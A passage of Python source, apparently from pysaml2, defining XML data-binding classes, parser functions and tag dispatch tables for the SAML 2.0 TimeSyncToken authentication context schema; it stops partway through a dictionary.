class SecretKeyProtection(SecretKeyProtectionType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SecretKeyProtection element """

    # Concrete element: same content model as its *Type_ base, new tag.
    c_tag = 'SecretKeyProtection'
    c_namespace = NAMESPACE
    c_children = SecretKeyProtectionType_.c_children.copy()
    c_attributes = SecretKeyProtectionType_.c_attributes.copy()
    c_child_order = SecretKeyProtectionType_.c_child_order[:]
    c_cardinality = SecretKeyProtectionType_.c_cardinality.copy()


def secret_key_protection_from_string(xml_string):
    """Build a SecretKeyProtection instance from an XML string."""
    return saml2.create_class_from_xml_string(SecretKeyProtection, xml_string)
class PrivateKeyProtection(PrivateKeyProtectionType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PrivateKeyProtection element """

    # Concrete element: same content model as its *Type_ base, new tag.
    c_tag = 'PrivateKeyProtection'
    c_namespace = NAMESPACE
    c_children = PrivateKeyProtectionType_.c_children.copy()
    c_attributes = PrivateKeyProtectionType_.c_attributes.copy()
    c_child_order = PrivateKeyProtectionType_.c_child_order[:]
    c_cardinality = PrivateKeyProtectionType_.c_cardinality.copy()


def private_key_protection_from_string(xml_string):
    """Build a PrivateKeyProtection instance from an XML string."""
    return saml2.create_class_from_xml_string(PrivateKeyProtection, xml_string)
class TechnicalProtectionBaseType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:TechnicalProtectionBaseType element """

    c_tag = 'TechnicalProtectionBaseType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PrivateKeyProtection'] = ('private_key_protection', PrivateKeyProtection)
    c_cardinality['private_key_protection'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SecretKeyProtection'] = ('secret_key_protection', SecretKeyProtection)
    c_cardinality['secret_key_protection'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = ('extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(
        ['private_key_protection', 'secret_key_protection', 'extension'])

    def __init__(self,
                 private_key_protection=None,
                 secret_key_protection=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        """Initialise a TechnicalProtectionBaseType element instance."""
        SamlBase.__init__(self, text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.private_key_protection = private_key_protection
        self.secret_key_protection = secret_key_protection
        self.extension = extension or []


def technical_protection_base_type__from_string(xml_string):
    """Build a TechnicalProtectionBaseType_ instance from an XML string."""
    return saml2.create_class_from_xml_string(
        TechnicalProtectionBaseType_, xml_string)
class TechnicalProtection(TechnicalProtectionBaseType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:TechnicalProtection element """

    # Concrete element: same content model as its *BaseType_ base, new tag.
    c_tag = 'TechnicalProtection'
    c_namespace = NAMESPACE
    c_children = TechnicalProtectionBaseType_.c_children.copy()
    c_attributes = TechnicalProtectionBaseType_.c_attributes.copy()
    c_child_order = TechnicalProtectionBaseType_.c_child_order[:]
    c_cardinality = TechnicalProtectionBaseType_.c_cardinality.copy()


def technical_protection_from_string(xml_string):
    """Build a TechnicalProtection instance from an XML string."""
    return saml2.create_class_from_xml_string(TechnicalProtection, xml_string)
#..................
# ['ComplexAuthenticator', 'Authenticator', 'AuthnMethod', 'ComplexAuthenticatorType', 'AuthenticatorBaseType', 'AuthnContextDeclarationBaseType', 'AuthnMethodBaseType', 'AuthenticationContextDeclaration']
class ComplexAuthenticatorType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ComplexAuthenticatorType element """

    c_tag = 'ComplexAuthenticatorType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PreviousSession'] = ('previous_session', PreviousSession)
    c_cardinality['previous_session'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ResumeSession'] = ('resume_session', ResumeSession)
    c_cardinality['resume_session'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}DigSig'] = ('dig_sig', DigSig)
    c_cardinality['dig_sig'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Password'] = ('password', Password)
    c_cardinality['password'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}RestrictedPassword'] = ('restricted_password', RestrictedPassword)
    c_cardinality['restricted_password'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ZeroKnowledge'] = ('zero_knowledge', ZeroKnowledge)
    c_cardinality['zero_knowledge'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SharedSecretChallengeResponse'] = ('shared_secret_challenge_response', SharedSecretChallengeResponse)
    c_cardinality['shared_secret_challenge_response'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SharedSecretDynamicPlaintext'] = ('shared_secret_dynamic_plaintext', SharedSecretDynamicPlaintext)
    c_cardinality['shared_secret_dynamic_plaintext'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}IPAddress'] = ('ip_address', IPAddress)
    c_cardinality['ip_address'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AsymmetricDecryption'] = ('asymmetric_decryption', AsymmetricDecryption)
    c_cardinality['asymmetric_decryption'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AsymmetricKeyAgreement'] = ('asymmetric_key_agreement', AsymmetricKeyAgreement)
    c_cardinality['asymmetric_key_agreement'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SubscriberLineNumber'] = ('subscriber_line_number', SubscriberLineNumber)
    c_cardinality['subscriber_line_number'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}UserSuffix'] = ('user_suffix', UserSuffix)
    c_cardinality['user_suffix'] = {"min": 0, "max": 1}
    # The ComplexAuthenticator child refers to a class defined later; its
    # c_children entry is patched in after both classes exist (see the
    # module-level assignments further down), only the cardinality is set here.
    c_cardinality['complex_authenticator'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = ('extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(
        ['previous_session', 'resume_session', 'dig_sig', 'password',
         'restricted_password', 'zero_knowledge',
         'shared_secret_challenge_response', 'shared_secret_dynamic_plaintext',
         'ip_address', 'asymmetric_decryption', 'asymmetric_key_agreement',
         'subscriber_line_number', 'user_suffix', 'complex_authenticator',
         'extension'])

    def __init__(self,
                 previous_session=None,
                 resume_session=None,
                 dig_sig=None,
                 password=None,
                 restricted_password=None,
                 zero_knowledge=None,
                 shared_secret_challenge_response=None,
                 shared_secret_dynamic_plaintext=None,
                 ip_address=None,
                 asymmetric_decryption=None,
                 asymmetric_key_agreement=None,
                 subscriber_line_number=None,
                 user_suffix=None,
                 complex_authenticator=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        """Initialise a ComplexAuthenticatorType element instance."""
        SamlBase.__init__(self, text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.previous_session = previous_session
        self.resume_session = resume_session
        self.dig_sig = dig_sig
        self.password = password
        self.restricted_password = restricted_password
        self.zero_knowledge = zero_knowledge
        self.shared_secret_challenge_response = shared_secret_challenge_response
        self.shared_secret_dynamic_plaintext = shared_secret_dynamic_plaintext
        self.ip_address = ip_address
        self.asymmetric_decryption = asymmetric_decryption
        self.asymmetric_key_agreement = asymmetric_key_agreement
        self.subscriber_line_number = subscriber_line_number
        self.user_suffix = user_suffix
        self.complex_authenticator = complex_authenticator
        self.extension = extension or []


def complex_authenticator_type__from_string(xml_string):
    """Build a ComplexAuthenticatorType_ instance from an XML string."""
    return saml2.create_class_from_xml_string(
        ComplexAuthenticatorType_, xml_string)
class ComplexAuthenticator(ComplexAuthenticatorType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ComplexAuthenticator element """

    # Concrete element: same content model as its *Type_ base, new tag.
    c_tag = 'ComplexAuthenticator'
    c_namespace = NAMESPACE
    c_children = ComplexAuthenticatorType_.c_children.copy()
    c_attributes = ComplexAuthenticatorType_.c_attributes.copy()
    c_child_order = ComplexAuthenticatorType_.c_child_order[:]
    c_cardinality = ComplexAuthenticatorType_.c_cardinality.copy()


def complex_authenticator_from_string(xml_string):
    """Build a ComplexAuthenticator instance from an XML string."""
    return saml2.create_class_from_xml_string(ComplexAuthenticator, xml_string)
class AuthenticatorBaseType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthenticatorBaseType element """

    c_tag = 'AuthenticatorBaseType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PreviousSession'] = ('previous_session', PreviousSession)
    c_cardinality['previous_session'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ResumeSession'] = ('resume_session', ResumeSession)
    c_cardinality['resume_session'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}DigSig'] = ('dig_sig', DigSig)
    c_cardinality['dig_sig'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Password'] = ('password', Password)
    c_cardinality['password'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}RestrictedPassword'] = ('restricted_password', RestrictedPassword)
    c_cardinality['restricted_password'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ZeroKnowledge'] = ('zero_knowledge', ZeroKnowledge)
    c_cardinality['zero_knowledge'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SharedSecretChallengeResponse'] = ('shared_secret_challenge_response', SharedSecretChallengeResponse)
    c_cardinality['shared_secret_challenge_response'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SharedSecretDynamicPlaintext'] = ('shared_secret_dynamic_plaintext', SharedSecretDynamicPlaintext)
    c_cardinality['shared_secret_dynamic_plaintext'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}IPAddress'] = ('ip_address', IPAddress)
    c_cardinality['ip_address'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AsymmetricDecryption'] = ('asymmetric_decryption', AsymmetricDecryption)
    c_cardinality['asymmetric_decryption'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AsymmetricKeyAgreement'] = ('asymmetric_key_agreement', AsymmetricKeyAgreement)
    c_cardinality['asymmetric_key_agreement'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SubscriberLineNumber'] = ('subscriber_line_number', SubscriberLineNumber)
    c_cardinality['subscriber_line_number'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}UserSuffix'] = ('user_suffix', UserSuffix)
    c_cardinality['user_suffix'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ComplexAuthenticator'] = ('complex_authenticator', ComplexAuthenticator)
    c_cardinality['complex_authenticator'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = ('extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(
        ['previous_session', 'resume_session', 'dig_sig', 'password',
         'restricted_password', 'zero_knowledge',
         'shared_secret_challenge_response', 'shared_secret_dynamic_plaintext',
         'ip_address', 'asymmetric_decryption', 'asymmetric_key_agreement',
         'subscriber_line_number', 'user_suffix', 'complex_authenticator',
         'extension'])

    def __init__(self,
                 previous_session=None,
                 resume_session=None,
                 dig_sig=None,
                 password=None,
                 restricted_password=None,
                 zero_knowledge=None,
                 shared_secret_challenge_response=None,
                 shared_secret_dynamic_plaintext=None,
                 ip_address=None,
                 asymmetric_decryption=None,
                 asymmetric_key_agreement=None,
                 subscriber_line_number=None,
                 user_suffix=None,
                 complex_authenticator=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        """Initialise an AuthenticatorBaseType element instance."""
        SamlBase.__init__(self, text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.previous_session = previous_session
        self.resume_session = resume_session
        self.dig_sig = dig_sig
        self.password = password
        self.restricted_password = restricted_password
        self.zero_knowledge = zero_knowledge
        self.shared_secret_challenge_response = shared_secret_challenge_response
        self.shared_secret_dynamic_plaintext = shared_secret_dynamic_plaintext
        self.ip_address = ip_address
        self.asymmetric_decryption = asymmetric_decryption
        self.asymmetric_key_agreement = asymmetric_key_agreement
        self.subscriber_line_number = subscriber_line_number
        self.user_suffix = user_suffix
        self.complex_authenticator = complex_authenticator
        self.extension = extension or []


def authenticator_base_type__from_string(xml_string):
    """Build an AuthenticatorBaseType_ instance from an XML string."""
    return saml2.create_class_from_xml_string(
        AuthenticatorBaseType_, xml_string)
class Authenticator(AuthenticatorBaseType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Authenticator element """

    # Concrete element: same content model as its *BaseType_ base, new tag.
    c_tag = 'Authenticator'
    c_namespace = NAMESPACE
    c_children = AuthenticatorBaseType_.c_children.copy()
    c_attributes = AuthenticatorBaseType_.c_attributes.copy()
    c_child_order = AuthenticatorBaseType_.c_child_order[:]
    c_cardinality = AuthenticatorBaseType_.c_cardinality.copy()


def authenticator_from_string(xml_string):
    """Build an Authenticator instance from an XML string."""
    return saml2.create_class_from_xml_string(Authenticator, xml_string)
class AuthnMethodBaseType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthnMethodBaseType element """

    c_tag = 'AuthnMethodBaseType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PrincipalAuthenticationMechanism'] = ('principal_authentication_mechanism', PrincipalAuthenticationMechanism)
    c_cardinality['principal_authentication_mechanism'] = {"min": 0, "max": 1}
    # Note: 'authenticator' has no cardinality entry, i.e. it is mandatory.
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Authenticator'] = ('authenticator', Authenticator)
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AuthenticatorTransportProtocol'] = ('authenticator_transport_protocol', AuthenticatorTransportProtocol)
    c_cardinality['authenticator_transport_protocol'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = ('extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    c_child_order.extend(['principal_authentication_mechanism', 'authenticator',
                          'authenticator_transport_protocol', 'extension'])

    def __init__(self,
                 principal_authentication_mechanism=None,
                 authenticator=None,
                 authenticator_transport_protocol=None,
                 extension=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        """Initialise an AuthnMethodBaseType element instance."""
        SamlBase.__init__(self, text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.principal_authentication_mechanism = principal_authentication_mechanism
        self.authenticator = authenticator
        self.authenticator_transport_protocol = authenticator_transport_protocol
        self.extension = extension or []


def authn_method_base_type__from_string(xml_string):
    """Build an AuthnMethodBaseType_ instance from an XML string."""
    return saml2.create_class_from_xml_string(AuthnMethodBaseType_, xml_string)
class AuthnMethod(AuthnMethodBaseType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthnMethod element """

    # Concrete element: same content model as its *BaseType_ base, new tag.
    c_tag = 'AuthnMethod'
    c_namespace = NAMESPACE
    c_children = AuthnMethodBaseType_.c_children.copy()
    c_attributes = AuthnMethodBaseType_.c_attributes.copy()
    c_child_order = AuthnMethodBaseType_.c_child_order[:]
    c_cardinality = AuthnMethodBaseType_.c_cardinality.copy()


def authn_method_from_string(xml_string):
    """Build an AuthnMethod instance from an XML string."""
    return saml2.create_class_from_xml_string(AuthnMethod, xml_string)
class AuthnContextDeclarationBaseType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthnContextDeclarationBaseType element """

    c_tag = 'AuthnContextDeclarationBaseType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Identification'] = ('identification', Identification)
    c_cardinality['identification'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}TechnicalProtection'] = ('technical_protection', TechnicalProtection)
    c_cardinality['technical_protection'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}OperationalProtection'] = ('operational_protection', OperationalProtection)
    c_cardinality['operational_protection'] = {"min": 0, "max": 1}
    # Note: 'authn_method' has no cardinality entry, i.e. it is mandatory.
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}AuthnMethod'] = ('authn_method', AuthnMethod)
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}GoverningAgreements'] = ('governing_agreements', GoverningAgreements)
    c_cardinality['governing_agreements'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = ('extension', [Extension])
    c_cardinality['extension'] = {"min": 0}
    # Optional XML attribute ID, exposed as the 'id' python attribute.
    c_attributes['ID'] = ('id', 'ID', False)
    c_child_order.extend(
        ['identification', 'technical_protection', 'operational_protection',
         'authn_method', 'governing_agreements', 'extension'])

    def __init__(self,
                 identification=None,
                 technical_protection=None,
                 operational_protection=None,
                 authn_method=None,
                 governing_agreements=None,
                 extension=None,
                 id=None,
                 text=None,
                 extension_elements=None,
                 extension_attributes=None):
        """Initialise an AuthnContextDeclarationBaseType element instance."""
        SamlBase.__init__(self, text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.identification = identification
        self.technical_protection = technical_protection
        self.operational_protection = operational_protection
        self.authn_method = authn_method
        self.governing_agreements = governing_agreements
        self.extension = extension or []
        self.id = id


def authn_context_declaration_base_type__from_string(xml_string):
    """Build an AuthnContextDeclarationBaseType_ instance from an XML string."""
    return saml2.create_class_from_xml_string(
        AuthnContextDeclarationBaseType_, xml_string)
class AuthenticationContextDeclaration(AuthnContextDeclarationBaseType_):
    """The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthenticationContextDeclaration element """

    # Root element of the declaration; same content model as its base, new tag.
    c_tag = 'AuthenticationContextDeclaration'
    c_namespace = NAMESPACE
    c_children = AuthnContextDeclarationBaseType_.c_children.copy()
    c_attributes = AuthnContextDeclarationBaseType_.c_attributes.copy()
    c_child_order = AuthnContextDeclarationBaseType_.c_child_order[:]
    c_cardinality = AuthnContextDeclarationBaseType_.c_cardinality.copy()


def authentication_context_declaration_from_string(xml_string):
    """Build an AuthenticationContextDeclaration instance from an XML string."""
    return saml2.create_class_from_xml_string(
        AuthenticationContextDeclaration, xml_string)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# ComplexAuthenticator may contain itself; that forward reference can only be
# registered once both classes exist, hence these late c_children patches.
ComplexAuthenticatorType_.c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ComplexAuthenticator'] = ('complex_authenticator', ComplexAuthenticator)
ComplexAuthenticator.c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ComplexAuthenticator'] = ('complex_authenticator', ComplexAuthenticator)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Dispatch table: element tag -> parser function that builds the matching
# class from an XML string (used by the module's generic deserialisation).
ELEMENT_FROM_STRING = {
AuthenticationContextDeclaration.c_tag: authentication_context_declaration_from_string,
Identification.c_tag: identification_from_string,
PhysicalVerification.c_tag: physical_verification_from_string,
WrittenConsent.c_tag: written_consent_from_string,
TechnicalProtection.c_tag: technical_protection_from_string,
SecretKeyProtection.c_tag: secret_key_protection_from_string,
PrivateKeyProtection.c_tag: private_key_protection_from_string,
KeyActivation.c_tag: key_activation_from_string,
KeySharing.c_tag: key_sharing_from_string,
KeyStorage.c_tag: key_storage_from_string,
SubscriberLineNumber.c_tag: subscriber_line_number_from_string,
UserSuffix.c_tag: user_suffix_from_string,
Password.c_tag: password_from_string,
ActivationPin.c_tag: activation_pin_from_string,
Token.c_tag: token_from_string,
TimeSyncToken.c_tag: time_sync_token_from_string,
Smartcard.c_tag: smartcard_from_string,
Length.c_tag: length_from_string,
ActivationLimit.c_tag: activation_limit_from_string,
Generation.c_tag: generation_from_string,
AuthnMethod.c_tag: authn_method_from_string,
PrincipalAuthenticationMechanism.c_tag: principal_authentication_mechanism_from_string,
Authenticator.c_tag: authenticator_from_string,
ComplexAuthenticator.c_tag: complex_authenticator_from_string,
PreviousSession.c_tag: previous_session_from_string,
ResumeSession.c_tag: resume_session_from_string,
ZeroKnowledge.c_tag: zero_knowledge_from_string,
SharedSecretChallengeResponse.c_tag: shared_secret_challenge_response_from_string,
SharedSecretChallengeResponseType_.c_tag: shared_secret_challenge_response_type__from_string,
DigSig.c_tag: dig_sig_from_string,
AsymmetricDecryption.c_tag: asymmetric_decryption_from_string,
AsymmetricKeyAgreement.c_tag: asymmetric_key_agreement_from_string,
PublicKeyType_.c_tag: public_key_type__from_string,
IPAddress.c_tag: ip_address_from_string,
SharedSecretDynamicPlaintext.c_tag: shared_secret_dynamic_plaintext_from_string,
AuthenticatorTransportProtocol.c_tag: authenticator_transport_protocol_from_string,
HTTP.c_tag: http_from_string,
IPSec.c_tag: ip_sec_from_string,
WTLS.c_tag: wtls_from_string,
MobileNetworkNoEncryption.c_tag: mobile_network_no_encryption_from_string,
MobileNetworkRadioEncryption.c_tag: mobile_network_radio_encryption_from_string,
MobileNetworkEndToEndEncryption.c_tag: mobile_network_end_to_end_encryption_from_string,
SSL.c_tag: ssl_from_string,
PSTN.c_tag: pstn_from_string,
ISDN.c_tag: isdn_from_string,
ADSL.c_tag: adsl_from_string,
OperationalProtection.c_tag: operational_protection_from_string,
SecurityAudit.c_tag: security_audit_from_string,
SwitchAudit.c_tag: switch_audit_from_string,
DeactivationCallCenter.c_tag: deactivation_call_center_from_string,
GoverningAgreements.c_tag: governing_agreements_from_string,
GoverningAgreementRef.c_tag: governing_agreement_ref_from_string,
NymType_.c_tag: nym_type__from_string,
IdentificationType_.c_tag: identification_type__from_string,
TechnicalProtectionBaseType_.c_tag: technical_protection_base_type__from_string,
OperationalProtectionType_.c_tag: operational_protection_type__from_string,
GoverningAgreementsType_.c_tag: governing_agreements_type__from_string,
GoverningAgreementRefType_.c_tag: governing_agreement_ref_type__from_string,
AuthenticatorBaseType_.c_tag: authenticator_base_type__from_string,
ComplexAuthenticatorType_.c_tag: complex_authenticator_type__from_string,
AuthenticatorTransportProtocolType_.c_tag: authenticator_transport_protocol_type__from_string,
KeyActivationType_.c_tag: key_activation_type__from_string,
KeySharingType_.c_tag: key_sharing_type__from_string,
PrivateKeyProtectionType_.c_tag: private_key_protection_type__from_string,
PasswordType_.c_tag: password_type__from_string,
RestrictedPassword.c_tag: restricted_password_from_string,
RestrictedPasswordType_.c_tag: restricted_password_type__from_string,
RestrictedLengthType_.c_tag: restricted_length_type__from_string,
ActivationPinType_.c_tag: activation_pin_type__from_string,
Alphabet.c_tag: alphabet_from_string,
AlphabetType_.c_tag: alphabet_type__from_string,
DeviceTypeType_.c_tag: device_type_type__from_string,
BooleanType_.c_tag: boolean_type__from_string,
ActivationLimitType_.c_tag: activation_limit_type__from_string,
ActivationLimitDuration.c_tag: activation_limit_duration_from_string,
ActivationLimitUsages.c_tag: activation_limit_usages_from_string,
ActivationLimitSession.c_tag: activation_limit_session_from_string,
ActivationLimitDurationType_.c_tag: activation_limit_duration_type__from_string,
ActivationLimitUsagesType_.c_tag: activation_limit_usages_type__from_string,
ActivationLimitSessionType_.c_tag: activation_limit_session_type__from_string,
LengthType_.c_tag: length_type__from_string,
MediumType_.c_tag: medium_type__from_string,
KeyStorageType_.c_tag: key_storage_type__from_string,
SecretKeyProtectionType_.c_tag: secret_key_protection_type__from_string,
SecurityAuditType_.c_tag: security_audit_type__from_string,
ExtensionOnlyType_.c_tag: extension_only_type__from_string,
Extension.c_tag: extension_from_string,
ExtensionType_.c_tag: extension_type__from_string,
AuthnContextDeclarationBaseType_.c_tag: authn_context_declaration_base_type__from_string,
AuthnMethodBaseType_.c_tag: authn_method_base_type__from_string,
PrincipalAuthenticationMechanismType_.c_tag: principal_authentication_mechanism_type__from_string,
TokenType_.c_tag: token_type__from_string,
TimeSyncTokenType_.c_tag: time_sync_token_type__from_string,
}
# Dispatch table: element tag -> element class (used by factory() below).
ELEMENT_BY_TAG = {
'AuthenticationContextDeclaration': AuthenticationContextDeclaration,
'Identification': Identification,
'PhysicalVerification': PhysicalVerification,
'WrittenConsent': WrittenConsent,
'TechnicalProtection': TechnicalProtection,
'SecretKeyProtection': SecretKeyProtection,
'PrivateKeyProtection': PrivateKeyProtection,
'KeyActivation': KeyActivation,
'KeySharing': KeySharing,
'KeyStorage': KeyStorage,
'SubscriberLineNumber': SubscriberLineNumber,
'UserSuffix': UserSuffix,
'Password': Password,
'ActivationPin': ActivationPin,
'Token': Token,
'TimeSyncToken': TimeSyncToken,
'Smartcard': Smartcard,
'Length': Length,
'ActivationLimit': ActivationLimit,
'Generation': Generation,
'AuthnMethod': AuthnMethod,
'PrincipalAuthenticationMechanism': PrincipalAuthenticationMechanism,
'Authenticator': Authenticator,
'ComplexAuthenticator': ComplexAuthenticator,
'PreviousSession': PreviousSession,
'ResumeSession': ResumeSession,
'ZeroKnowledge': ZeroKnowledge,
'SharedSecretChallengeResponse': SharedSecretChallengeResponse,
'SharedSecretChallengeResponseType': SharedSecretChallengeResponseType_,
'DigSig': DigSig,
'AsymmetricDecryption': AsymmetricDecryption,
'AsymmetricKeyAgreement': AsymmetricKeyAgreement,
'PublicKeyType': PublicKeyType_,
'IPAddress': IPAddress,
'SharedSecretDynamicPlaintext': SharedSecretDynamicPlaintext,
'AuthenticatorTransportProtocol': AuthenticatorTransportProtocol,
'HTTP': HTTP,
'IPSec': IPSec,
'WTLS': WTLS,
'MobileNetworkNoEncryption': MobileNetworkNoEncryption,
'MobileNetworkRadioEncryption': MobileNetworkRadioEncryption,
'MobileNetworkEndToEndEncryption': MobileNetworkEndToEndEncryption,
'SSL': SSL,
'PSTN': PSTN,
'ISDN': ISDN,
'ADSL': ADSL,
'OperationalProtection': OperationalProtection,
'SecurityAudit': SecurityAudit,
'SwitchAudit': SwitchAudit,
'DeactivationCallCenter': DeactivationCallCenter,
'GoverningAgreements': GoverningAgreements,
'GoverningAgreementRef': GoverningAgreementRef,
'nymType': NymType_,
'IdentificationType': IdentificationType_,
'TechnicalProtectionBaseType': TechnicalProtectionBaseType_,
'OperationalProtectionType': OperationalProtectionType_,
'GoverningAgreementsType': GoverningAgreementsType_,
'GoverningAgreementRefType': GoverningAgreementRefType_,
'AuthenticatorBaseType': AuthenticatorBaseType_,
'ComplexAuthenticatorType': ComplexAuthenticatorType_,
'AuthenticatorTransportProtocolType': AuthenticatorTransportProtocolType_,
'KeyActivationType': KeyActivationType_,
'KeySharingType': KeySharingType_,
'PrivateKeyProtectionType': PrivateKeyProtectionType_,
'PasswordType': PasswordType_,
'RestrictedPassword': RestrictedPassword,
'RestrictedPasswordType': RestrictedPasswordType_,
'RestrictedLengthType': RestrictedLengthType_,
'ActivationPinType': ActivationPinType_,
'Alphabet': Alphabet,
'AlphabetType': AlphabetType_,
'DeviceTypeType': DeviceTypeType_,
